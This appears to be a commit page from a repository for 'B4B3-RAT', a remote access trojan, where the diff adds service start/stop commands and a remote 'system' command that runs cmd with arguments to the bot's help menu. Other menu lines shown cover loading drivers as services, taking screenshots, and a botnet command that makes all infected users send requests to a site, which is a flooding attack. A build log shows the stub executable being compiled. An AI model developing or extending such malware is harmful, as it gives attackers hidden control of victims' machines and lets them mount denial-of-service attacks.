Skip to content

Commit 2f8a959

Browse files
committed
Fixed "system" command. Added new commands in service manager
1 parent 9b58e23 commit 2f8a959

File tree

19 files changed

+99
-12
lines changed

19 files changed

+99
-12
lines changed

B4B3-RAT/Builder/DlgProc.cpp

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -176,6 +176,8 @@ INT_PTR DlgMain(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
176176
"/user[ID] service show - show all services in system %0A"
177177
"/user[ID] service add [Name] [DisplayName] [C:\\ProgramData\\yourdriver.sys] [Type-Driver] [Start-Type] - load driver to system %0A"
178178
"/user[ID] service delete [NameService] - delete service from system %0A"
179+
"/user[ID] service stop [NameService] - stop the running service %0A"
180+
"/user[ID] service start [NameService] - start the stopped service %0A"
179181

180182
"%0AScreen manager:%0A"
181183
"/user[ID] screenshot - take screenshot and send you %0A"
@@ -184,6 +186,9 @@ INT_PTR DlgMain(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
184186
"/botnet start [url] - all users send requests on site %0A"
185187
"/botnet stop - stop sending requests %0A"
186188

189+
"%0ACMD manager:%0A"
190+
"/user[ID] system [arguments] - run cmd with arguments %0A"
191+
187192
"%0ARAT:%0A"
188193
"/online - show online users%0A";
189194

736 Bytes
Binary file not shown.
211 Bytes
Binary file not shown.

B4B3-RAT/Builder/Release/vc142.pdb

0 Bytes
Binary file not shown.
2.09 KB
Binary file not shown.

B4B3-RAT/Stub/Release/Stub.log

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,8 +1,8 @@
1-
 BotNet.cpp
1+
 ServiceManager.cpp
22
WinMain.cpp
33
Создание кода
4-
0 of 1652 functions ( 0.0%) were compiled, the rest were copied from previous compilation.
5-
0 functions were new in current compilation
6-
0 functions had inline decision re-evaluated but remain unchanged
4+
4 of 1654 functions ( 0.2%) were compiled, the rest were copied from previous compilation.
5+
3 functions were new in current compilation
6+
16 functions had inline decision re-evaluated but remain unchanged
77
Создание кода завершено
88
Stub.vcxproj -> D:\VisualStudio\source\repos\B4B3-RAT\Release\Stub.exe
0 Bytes
Binary file not shown.
0 Bytes
Binary file not shown.
632 Bytes
Binary file not shown.
344 Bytes
Binary file not shown.

0 commit comments

Comments
 (0)